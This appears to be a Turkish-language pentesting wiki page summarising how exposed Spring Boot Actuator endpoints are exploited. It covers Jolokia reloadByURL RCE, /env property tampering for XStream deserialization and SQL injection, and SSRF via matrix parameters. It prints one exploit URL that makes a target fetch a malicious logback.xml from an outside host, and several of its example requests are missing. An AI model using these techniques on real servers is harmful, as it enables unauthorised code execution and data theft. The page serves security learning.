Spring Actuators
Spring Auth Atlatma
Şuradan https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png****
Spring Boot Actuators'ü Sömürme
Orijinal yazıyı kontrol edin [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]
Ana Noktalar:
Spring Boot Actuators,
/health
,/trace
,/beans
,/env
gibi uç noktaları kaydeder. Sürümler 1'den 1.4'e kadar, bu uç noktalara kimlik doğrulama olmadan erişilebilir. Sürüm 1.5'ten itibaren yalnızca/health
ve/info
varsayılan olarak hassas olmayan uç noktalardır, ancak geliştiriciler genellikle bu güvenliği devre dışı bırakırlar.Belirli Actuator uç noktaları hassas verileri açığa çıkarabilir veya zararlı eylemlere izin verebilir:
/dump
,/trace
,/logfile
,/shutdown
,/mappings
,/env
,/actuator/env
,/restart
ve/heapdump
.Spring Boot 1.x'te actuator'ler kök URL altında kaydedilirken, 2.x'te
/actuator/
temel yolun altında kaydedilir.
Sömürü Teknikleri:
'/jolokia' Üzerinden Uzaktan Kod Yürütme:
/jolokia
actuator uç noktası, HTTP erişimine izin veren Jolokia Kütüphanesini açığa çıkarır.reloadByURL
eylemi, dış URL'den günlüğü yeniden yüklemek için sömürülebilir, bu da oluşturulmuş XML yapılandırmaları aracılığıyla kör XXE veya Uzaktan Kod Yürütme'ye yol açabilir.Örnek sömürü URL'si:
http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml
.
'/env' Üzerinden Yapılandırma Değişikliği:
Spring Cloud Kütüphaneleri varsa,
/env
uç noktası çevresel özelliklerin değiştirilmesine izin verir.Özellikler, Eureka servisURL'sindeki XStream deserializasyon açığı gibi zafiyetlerin sömürülmesi için manipüle edilebilir.
Örnek sömürü POST isteği:
Diğer Faydalı Ayarlar:
spring.datasource.tomcat.validationQuery
,spring.datasource.tomcat.url
vespring.datasource.tomcat.max-active
gibi özellikler, SQL enjeksiyonu veya veritabanı bağlantı dizelerinin değiştirilmesi gibi çeşitli sömürüler için manipüle edilebilir.
Ek Bilgiler:
Varsayılan actuator'lerin kapsamlı bir listesi burada bulunabilir.
Spring Boot 2.x'te
/env
uç noktası özellik değişiklikleri için JSON formatını kullanır, ancak genel kavram aynı kalır.
İlgili Konular:
Env + H2 RCE:
/env
uç noktası ve H2 veritabanının kombinasyonunu sömürme detayları burada bulunabilir.
Yanlış Yol Adı Yorumlamasıyla Spring Boot Üzerinde SSRF:
Spring çerçevesinin HTTP yol adlarında matris parametrelerini (
;
) işleme şekli, Sunucu Tarafı İstek Sahteciliği (SSRF) için sömürülebilir.Örnek sömürü isteği:
Last updated